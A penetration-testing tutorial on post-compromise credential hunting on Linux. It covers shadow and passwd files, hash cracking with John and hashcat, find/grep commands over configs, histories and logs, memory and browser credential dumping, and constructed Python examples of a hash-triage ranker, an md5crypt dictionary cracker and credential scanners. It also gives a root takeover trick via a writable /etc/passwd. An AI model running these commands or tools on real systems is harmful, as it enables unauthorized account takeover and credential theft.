
Big Picture
Let’s say you’re on a penetration test for a company and you manage to phish a standard user’s credentials and remotely connect to their workstation. This user has no admin privileges, so doing anything interesting or moving laterally across the network is hard. Luckily you’ve stumbled across this article; after reading it you’ll have some new places to look for other credentials on this workstation (and on other Linux systems).
Linux Authentication Process
Here are some important files where you could find a user’s password or password hashes on Linux systems, along with the security risk each one carries.
/etc/passwd
- Readable by all users (world-readable)
- Contains user account information (7 fields): username, password placeholder, UID, GID, GECOS, home directory, shell
- Password field normally shows x (meaning the hash lives in /etc/shadow)
- Security risk: if the file is writable by a non-root user, or still holds real hashes, it can be abused, because a hash in this field is used in preference to the /etc/shadow entry
- Exploit: if /etc/passwd is writable, blank root’s password field (root::0:0:…) and su root stops asking for a password; alternatively write a hash you generated yourself (openssl passwd) into that field
/etc/shadow
- Readable only by root (and, on Debian-based systems, members of the shadow group)
- Stores the actual password hashes (9 fields)
- Format: username:$id$salt$hashed:lastchange:minage:maxage:warning:…
- A password field starting with ! (locked, as set by passwd -l) or consisting of * (no password ever set) means the user cannot log in with a Unix password, but other methods such as SSH keys still work. A locked entry usually still carries the old hash after the !, which can be cracked like any other
- Empty password field = no password required (pam_unix only accepts this when the nullok option is set in /etc/pam.d/, which Debian and Ubuntu do by default)
/etc/security/opasswd
- Stores previous password hashes (written by pam_unix’s remember= option or by pam_pwhistory) so users cannot reuse them
- Requires root privileges to read
- Useful for spotting password patterns (Summer2023 followed by Summer2024) and for old hashes that may be easier to crack
Hash Algorithm IDs
Hashing is a one-way operation: plaintext is scrambled (fancy maths) into a fixed-length string that looks random. Because hashing cannot be reversed, we cannot un-hash anything; what we can do is hash a candidate plaintext with the same algorithm and the same salt and check whether the result equals the stored hash. Linux password hashes carry an identifier between dollar signs that tells you which algorithm was used, followed by the salt and then the hash itself. The salt means two users with the same password get different hashes, and that each hash has to be attacked separately. Older, fast algorithms like md5crypt are much easier to crack than the modern, deliberately slow ones.
- $1$ = md5crypt (MD5-based; fast to compute and therefore the easiest to crack)
- $5$ = sha256crypt (SHA-256 based, 5000 rounds by default)
- $6$ = sha512crypt (SHA-512 based, 5000 rounds by default; still very common)
- $y$ = yescrypt (the default on recent Debian, Ubuntu and Fedora releases)
- $2a$ / $2b$ / $2y$ = bcrypt (Blowfish-based)
- $7$ = scrypt
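The following is an added example and not code from the original article: a small parser for the 9-field shadow format and the $id$ prefixes described above, which ranks accounts by how cheaply an attacker can get in (empty password first, then hashes from the fastest algorithm to the slowest, locked and disabled accounts last). The sample lines are constructed and the hash bodies are placeholders, not real digests, so it runs offline; reading a real /etc/shadow needs root.

```python
"""Parse /etc/shadow lines and rank accounts by how cheaply they can be attacked.

Added example, not from the original article. SAMPLE_SHADOW is constructed; the
hash portions are placeholders, not output of any real crypt() call.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# crypt(3) prefix -> algorithm name
HASH_IDS = {
    "des": "DES crypt (legacy, no $id$ prefix)", "1": "md5crypt (MD5)",
    "2a": "bcrypt (Blowfish)", "2b": "bcrypt (Blowfish)", "2y": "bcrypt (Blowfish)",
    "5": "sha256crypt (SHA-256)", "6": "sha512crypt (SHA-512)",
    "7": "scrypt", "y": "yescrypt",
}
# Triage order, cheapest to crack first (assumes default cost parameters)
WEAK_FIRST = ("des", "1", "5", "6", "2a", "2b", "2y", "7", "y")


@dataclass
class ShadowEntry:
    user: str
    status: str              # "no-password", "locked", "disabled" or "hashed"
    hash_id: Optional[str]
    algorithm: Optional[str]
    salt: Optional[str]
    raw: str                 # password field exactly as stored


def classify_hash(field: str) -> tuple[str, str, Optional[str]]:
    """Split a crypt(3) string into (hash_id, algorithm, salt)."""
    if not field.startswith("$"):
        return "des", HASH_IDS["des"], field[:2]        # DES: salt is the first 2 chars
    parts = field.split("$")                             # ['', id, ..., hash]
    hash_id = parts[1]
    algo = HASH_IDS.get(hash_id, f"unknown (${hash_id}$)")
    if hash_id.startswith("2") and len(parts) >= 4:
        salt = parts[3][:22]                             # bcrypt: $2b$cost$<22 salt><31 hash>
    elif len(parts) >= 4:
        salt = parts[-2]                                 # also handles rounds=N and yescrypt params
    else:
        salt = None
    return hash_id, algo, salt


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    user, pw = fields[0], fields[1]
    if pw == "":
        # Empty field: login without a password wherever pam_unix has nullok
        return ShadowEntry(user, "no-password", None, None, None, pw)
    if pw.startswith("!"):
        # passwd -l prepends '!': locked, but the old hash is usually still present
        inner = pw.lstrip("!")
        if inner and inner != "*":
            hash_id, algo, salt = classify_hash(inner)
            return ShadowEntry(user, "locked", hash_id, algo, salt, pw)
        return ShadowEntry(user, "locked", None, None, None, pw)
    if pw == "*":
        return ShadowEntry(user, "disabled", None, None, None, pw)   # never had a password
    hash_id, algo, salt = classify_hash(pw)
    return ShadowEntry(user, "hashed", hash_id, algo, salt, pw)


def triage(shadow_text: str) -> list[tuple[str, str]]:
    """Order accounts for an attacker: free logins first, then hashes from the
    cheapest algorithm to the most expensive, locked/disabled accounts last."""
    entries = [parse_shadow_line(l) for l in shadow_text.splitlines() if l.strip()]

    def rank(e: ShadowEntry) -> tuple[int, str]:
        if e.status == "no-password":
            return (0, e.user)
        if e.status == "hashed":
            pos = WEAK_FIRST.index(e.hash_id) if e.hash_id in WEAK_FIRST else len(WEAK_FIRST)
            return (1 + pos, e.user)
        return (100, e.user)

    return [(e.user, e.algorithm if e.status == "hashed" else e.status)
            for e in sorted(entries, key=rank)]


# Constructed sample: hash bodies are placeholders, not real hashes
SAMPLE_SHADOW = """\
root:$y$j9T$CONSTRUCTEDSALTyescrypt$CONSTRUCTEDHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:19800:0:99999:7:::
alice:$6$rounds=5000$Zq3c1k2M$CONSTRUCTEDHASHsha512cryptxxxxxxxxxxxxxxx:19800:0:99999:7:::
bob:$1$Oq0tcz9O$CONSTRUCTEDmd5cryptxx:19800:0:99999:7:::
carol:$2b$12$abcdefghijklmnopqrstuvCONSTRUCTEDbcrypthashxxxxxxxxxx:19800:0:99999:7:::
daemon:*:19800:0:99999:7:::
svc:!$6$LockedSalt$CONSTRUCTEDlockedhashxxxxxxxxxxxxxxxxxxxxxxxxxx:19800:0:99999:7:::
legacy::19800:0:99999:7:::
"""

if __name__ == "__main__":
    for user, why in triage(SAMPLE_SHADOW):
        print(f"{user:8} {why}")
```

Point it at a real file with `triage(open("/etc/shadow").read())` once you have root; the triage order is the order you would feed the entries to a cracker, and the locked svc account shows why `!`-prefixed entries should not be skipped.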
Cracking Linux Credentials
John the Ripper is a really good tool that takes a wordlist of candidate plaintext passwords (rockyou.txt is a good one, roughly 14 million entries in about 130 MB), hashes each candidate with the target’s algorithm and salt, and reports any that match the stored hashes. unshadow ships with John and merges /etc/passwd and /etc/shadow into the single-file format John expects (you need to have read both files first, which means root); the result can then be cracked with john --wordlist=rockyou.txt or fed to other crackers.
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
Hashcat
Hashcat is a very fast, GPU-accelerated, open-source password recovery tool. It attempts to recover plaintext passwords from their hashes by systematically trying candidate passwords.
Hashcat takes a hash and tries to find the original plaintext password by:
- Generating password guesses (from a wordlist, rules applied to a wordlist, or a mask)
- Hashing each guess with the same algorithm and the salt taken from the target hash
- Comparing the result to the target hash
- When they match, you’ve found the password
If we wanted to run this in a Linux terminal this would be the command to use:
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
- Mode 1800 = sha512crypt ($6$); use -m 500 for md5crypt ($1$), -m 7400 for sha256crypt ($5$) and -m 3200 for bcrypt ($2*$)
- -a 0 = straight (wordlist) attack
- Hashcat expects one hash per line (or user:hash together with --username), so cut the hash field out of the unshadow output (cut -d: -f2) rather than feeding it whole passwd-style lines
- Outputs cracked passwords to the specified file
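The loop Hashcat runs, shown as an added example that is not part of the original article and is not code from hashcat or John: a pure-Python md5crypt (the crypt(3) $1$ scheme, chosen because it is the simplest of the formats listed above and the one singled out as easiest to crack) and a dictionary attack against a hash generated in-block from a constructed password. The inline WORDLIST stands in for rockyou.txt; real cracking uses hashcat or john on a GPU, this only makes the guess, hash, compare steps visible.

```python
"""Dictionary attack against an md5crypt ($1$) hash, step by step.

Added example, not from the original article and not hashcat/John code.
md5crypt follows the original crypt(3) $1$ algorithm (fixed 1000 MD5 rounds).
The target hash and WORDLIST are constructed so the script runs offline.
"""
import hashlib
from typing import Iterable, Optional

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, n: int) -> str:
    """crypt's custom base64: emit n characters, low 6 bits first."""
    out = []
    for _ in range(n):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: bytes, salt: str) -> str:
    """Return the $1$salt$hash string for password and salt (salt is 8 chars max)."""
    magic = b"$1$"
    salt = salt[:8]
    salt_b = salt.encode()

    ctx = hashlib.md5(password + magic + salt_b)
    alt = hashlib.md5(password + salt_b + password).digest()
    pl = len(password)
    while pl > 0:                        # mix in the alternate digest per 16 bytes of password
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(password)
    while i:                             # bit-walk over the password length
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                # fixed, small iteration count: why $1$ cracks fast
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()

    encoded = (                          # byte permutation, then custom base64
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return f"$1${salt}${encoded}"


def crack_md5crypt(target: str, wordlist: Iterable[str]) -> Optional[str]:
    """hashcat -a 0 in miniature: reuse the target's salt, hash every guess,
    compare. Returns the matching plaintext or None if the wordlist misses."""
    if not target.startswith("$1$"):
        raise ValueError("only $1$ (md5crypt) hashes are handled here")
    salt = target.split("$")[2]
    for guess in wordlist:
        if md5crypt(guess.encode(), salt) == target:
            return guess
    return None


# Constructed stand-in for rockyou.txt
WORDLIST = ["123456", "password", "letmein", "Summer2024!", "qwerty"]

if __name__ == "__main__":
    # Constructed target: hash a known password so the run is checkable
    target = md5crypt(b"Summer2024!", "Oq0tcz9O")
    print(target)
    print("cracked:", crack_md5crypt(target, WORDLIST))
```

Each guess costs 1000 MD5 operations here; sha512crypt costs 5000 rounds of the slower SHA-512 and yescrypt is memory-hard on top, which is the whole difference between "easier to crack" and "modern default" in the list above.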
PAM (Pluggable Authentication Modules)
PAM is a flexible authentication framework used by Linux systems to handle authentication-related tasks. It sits between applications (login, sshd, sudo) and the actual authentication mechanisms, so administrators can configure how users authenticate without modifying individual applications; the stack for each service lives under /etc/pam.d/. pam_unix.so does not hand out hashes: when an unprivileged process such as a screen locker needs to verify a password, the module calls the privileged helper unix_chkpwd, which reads /etc/shadow on its behalf. What the PAM configuration does tell you is how the files above behave: nullok on pam_unix decides whether an empty password field lets you in, and remember=N (or pam_pwhistory) is what populates /etc/security/opasswd, so check these options when you find a readable /etc/pam.d/.
- Module location: /usr/lib/x86_64-linux-gnu/security/ (Debian/Ubuntu) or /usr/lib64/security/ (RedHat and derivatives)
- Common module: pam_unix.so (authenticates against, and updates, passwd/shadow)
Credential Hunting in Linux
Beyond the authentication files, other locations can hold credentials on Linux systems:
- Files (configs, databases, notes, scripts, cronjobs, SSH keys)
- History (logs, command-line history)
- Memory (cache, in-memory processing)
- Key-rings and browser stores (GNOME Keyring, KWallet, Firefox/Chromium saved logins)
Here are some tactics and commands you can use to try to locate these credentials:
Searching Files
Configuration Files
Common extensions: .conf, .config, .cnf
Find all config files (filtering out library, font and documentation noise):
for l in .conf .config .cnf; do find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done
Search configs for credentials (comment lines are dropped, -H prints the file name):
find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib" | while read -r i; do grep -H "user\|password\|pass" "$i" 2>/dev/null | grep -v "#"; done
- Config files often contain hardcoded credentials for services (~/.my.cnf for MySQL is a classic)
Database Files
Extensions: .sql, .db, .*db, .db*
for l in .sql .db ".*db" ".db*"; do find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done
- SQLite files (.db, .sqlite) are worth opening with sqlite3; application and browser databases frequently hold tokens and saved logins
Notes/Text Files
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null
- The parentheses matter: without them -type f only applies to the .txt branch and the second branch also lists directories
- Notes may contain credential lists, access points and hostnames
Scripts
Extensions: .py, .pyc, .pl, .go, .jar, .c, .sh
for l in .py .pyc .pl .go .jar .c .sh; do find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share"; done
- Scripts often contain hardcoded credentials for automation; grep them for the key terms listed at the end of this article
Cronjobs
Locations: /etc/crontab, /etc/cron.daily, /etc/cron.hourly, /etc/cron.d/
cat /etc/crontab
ls -la /etc/cron.*/
- Automated scripts may contain credentials
History Files
Command History
Files: .bash_history (plus .zsh_history, .mysql_history, .psql_history and .python_history where present); .bashrc and .bash_profile can also hold aliases and exported variables carrying credentials
tail -n5 /home/*/.bash*
- Users may have typed passwords directly into commands (mysql -p, sshpass, curl -u) which then sit in plain text in their history
Log Files
Log files are constantly generated on Linux systems and can also contain the credentials we are looking for. Most of /var/log is readable only by root or the adm group (auth.log on Debian is mode 0640 root:adm), so check what your user can actually open. Common log files and their locations:
/var/log/messages – Generic system activity logs (RedHat/CentOS)
/var/log/syslog – Generic system activity logs (Debian/Ubuntu)
/var/log/auth.log – (Debian/Ubuntu) All authentication related logs: logins, sudo commands, password changes, new users
/var/log/secure – (RedHat/CentOS) All authentication related logs
/var/log/boot.log – Booting information
/var/log/dmesg – Hardware and driver related messages
/var/log/kern.log – Kernel related warnings, errors and logs
/var/log/faillog – Failed login attempts (a binary database; read it with the faillog command)
/var/log/cron – Information related to cron jobs (RedHat/CentOS; Debian sends cron output to syslog)
/var/log/mail.log – All mail server related logs
/var/log/httpd/ – Apache logs (RedHat/CentOS; Debian uses /var/log/apache2/)
/var/log/mysqld.log – MySQL server log (RedHat/CentOS; Debian uses /var/log/mysql/)
The ones most worth reading first are the authentication logs (/var/log/auth.log or /var/log/secure), the general system log (/var/log/syslog or /var/log/messages) and the cron log. sudo records the full command line of everything it runs, so a password passed as an argument (for example mysql -pPASSWORD or curl -u user:pass) ends up in the authentication log in plain text.
Search the logs for credential-related events (case-insensitive, skipping binary files such as wtmp; rotated .gz logs need zgrep):
grep -rEIi "accepted|session opened|failure|failed|ssh|password changed|new user|sudo|COMMAND" /var/log/ 2>/dev/null
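As an added example, not part of the original article, here is the same search done as a parser rather than a grep: it pulls structured events (accepted and failed logins with source address, opened sessions, sudo command lines, new users, password changes) out of auth.log-style lines and flags passwords that sudo has logged as part of a command line. The log lines are constructed in classic syslog format; the `-p` heuristic assumes the common `mysql -pPASSWORD` form.

```python
"""Extract credential-relevant events from auth.log-style text.

Added example, not from the original article. SAMPLE_AUTH_LOG is constructed.
On a real host read /var/log/auth.log (Debian) or /var/log/secure (RedHat),
which normally requires root or adm group membership.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample lines, not from a real system
SAMPLE_AUTH_LOG = """\
Mar  3 09:12:01 ws01 sshd[1021]: Accepted password for alice from 10.0.0.5 port 51022 ssh2
Mar  3 09:12:01 ws01 sshd[1021]: pam_unix(sshd:session): session opened for user alice by (uid=0)
Mar  3 09:13:44 ws01 sshd[1044]: Failed password for invalid user admin from 10.0.0.99 port 41310 ssh2
Mar  3 09:14:10 ws01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/mysql -u root -pS3cretDBpass
Mar  3 09:15:02 ws01 useradd[1102]: new user: name=backup, UID=1002, GID=1002, home=/home/backup, shell=/bin/bash
Mar  3 09:16:30 ws01 passwd[1120]: pam_unix(passwd:chauthtok): password changed for backup
Mar  3 09:17:00 ws01 CRON[1150]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# One regex per event type the grep one-liner looks for; order matters (first match wins)
PATTERNS = {
    "accepted_login": re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+)"),
    "failed_login": re.compile(r"Failed (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"),
    "session_opened": re.compile(r"session opened for user (?P<user>\S+)"),
    "sudo_command": re.compile(r"sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$"),
    "new_user": re.compile(r"new user: name=(?P<user>[^,]+)"),
    "password_changed": re.compile(r"password changed for (?P<user>\S+)"),
}

# Heuristic (assumption): passwords glued to -p (mysql style) or given as --password=
CMDLINE_SECRET = re.compile(r"(?:--password=|\s-p)(\S+)")


def parse_auth_log(text: str) -> List[Dict[str, str]]:
    """Turn each recognised line into a dict with a 'kind' plus the regex groups."""
    events: List[Dict[str, str]] = []
    for line in text.splitlines():
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            ev = {"kind": kind, **m.groupdict()}
            if kind == "sudo_command":
                s = CMDLINE_SECRET.search(ev["cmd"])
                if s:
                    ev["possible_secret"] = s.group(1)   # sudo logged the password itself
            events.append(ev)
            break                                       # one event type per line
    return events


def summarize(events: List[Dict[str, str]]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Users seen on the box and (user, secret) pairs leaked via command lines."""
    users = sorted({e["user"] for e in events if "user" in e})
    secrets = [(e["user"], e["possible_secret"]) for e in events if "possible_secret" in e]
    return users, secrets


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    for ev in evs:
        print(ev)
    print(summarize(evs))
```

The user list is a cheap way to learn which accounts are active on the machine (and which are targeted by someone else, like the failed `admin` attempts), and the sudo lines are where command-line passwords end up verbatim.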
Memory and Cache
When users log in to their account or to other services, their credentials can end up in process memory and in caches. The following tools try to pull those credentials out before the memory is reused or cleared.
Mimipenguin
sudo python3 mimipenguin.py
- Extracts plaintext credentials of logged-in users from the memory of processes such as gnome-keyring-daemon, lightdm, sshd and vsftpd (a shell version, mimipenguin.sh, is also provided)
- This requires root privileges, since reading another process’s memory needs them
LaZagne (Linux Version)
sudo python3 laZagne.py all
- Extracts credentials from 30+ sources including:
- WiFi, browser passwords, SSH keys, Git configs
- Environment variables, Docker, shadow hashes
- Keyrings (encrypted password storage)
- Powerful all-in-one credential extraction tool; running it as root covers the sources a normal user cannot read
Browser Credentials
Users often reuse their passwords across online accounts and internal systems, so a browser’s saved logins are worth grabbing. We can use these tools to pull credentials out of different browsers:
Firefox
Storage: ~/.mozilla/firefox/[profile]/logins.json holds the encrypted usernames and passwords; the key that decrypts them is in key4.db in the same profile directory (older profiles used key3.db)
View the encrypted data:
jq . ~/.mozilla/firefox/[profile]/logins.json
Decrypt with Firefox Decrypt (it finds the profiles under ~/.mozilla/firefox on its own and prompts for the master password if one is set):
python3 firefox_decrypt.py
- The browser stores encrypted credentials, but the key sits next to them, so anyone who can read the profile directory can decrypt them
Or use LaZagne:
python3 laZagne.py browsers
Key Search Terms
When in doubt, grep files for these general key terms:
- user, username, password, pass, pwd
- login, creds, credentials, keys
- configuration, dbpassword, dbcredential
Tailor the search to the system’s purpose (web server, database server, desktop, etc.): a web server is more likely to have database credentials in its application config, a desktop to have them in browser stores and notes.
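An added example, not from the original article, of the key-term search done a little more carefully than a bare grep: it looks for assignments (key = value, key: value, export KEY=value) whose key contains one of the terms above, skips commented lines (the grep -v "#" step) and drops obvious placeholder or templated values that generate noise. The config and script snippets it scans are constructed.

```python
"""Scan config/script text for credential assignments by key term.

Added example, not from the original article. SAMPLE_MY_CNF and SAMPLE_SCRIPT
are constructed inputs; on a real host feed it the files found by the find
loops above.
"""
import re
from typing import List, Tuple

# Key terms from the article plus a few common secret names
KEY_TERMS = ("password", "passwd", "pass", "pwd", "credential", "creds", "secret",
             "api_key", "apikey", "token", "dbpassword", "dbcredential", "user", "login")

# key = value / key: value / export KEY=value, with optional quotes around the value.
# Values containing spaces are cut at the first space (good enough for triage).
ASSIGN = re.compile(r"""^\s*(?:export\s+)?(?P<key>[A-Za-z_][\w.\-]*)\s*[=:]\s*["']?(?P<val>[^"'\s#;]+)["']?""")
PLACEHOLDERS = {"changeme", "xxx", "xxxx", "<password>", "your_password_here", "none", "null"}
COMMENT_PREFIXES = ("#", "//", ";", "--")


def scan_for_credentials(text: str, terms=KEY_TERMS) -> List[Tuple[int, str, str]]:
    """Return (line_number, key, value) for credential-looking assignments."""
    hits: List[Tuple[int, str, str]] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(COMMENT_PREFIXES):
            continue                                   # commented-out lines are noise
        m = ASSIGN.match(line)
        if not m:
            continue
        key, val = m.group("key"), m.group("val")
        if not any(t in key.lower() for t in terms):
            continue
        if val.lower() in PLACEHOLDERS or val.startswith("${") or val.startswith("%("):
            continue                                   # placeholder / templated value
        hits.append((n, key, val))
    return hits


# Constructed ~/.my.cnf: MySQL client reads this and it frequently holds a real password
SAMPLE_MY_CNF = """\
# constructed ~/.my.cnf
[client]
user = appuser
password = "Pr0d-Db-P@ss"
host = 127.0.0.1
"""

# Constructed backup script with one real secret and two decoys
SAMPLE_SCRIPT = """\
#!/bin/bash
# constructed backup.sh
export DB_PASSWORD=changeme        # placeholder, should be ignored
export API_TOKEN=${API_TOKEN}      # templated, should be ignored
BACKUP_PASS='b4ckup!2024'
# password=commented_out_should_be_ignored
rsync -a /srv /mnt/backup
"""

if __name__ == "__main__":
    for name, text in (("my.cnf", SAMPLE_MY_CNF), ("backup.sh", SAMPLE_SCRIPT)):
        for n, key, val in scan_for_credentials(text):
            print(f"{name}:{n}: {key} = {val}")
```

Wrap it in a loop over the files the find commands return and you get a list of candidate (file, line, key, value) entries to try against other services, instead of pages of matches on the word "user".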
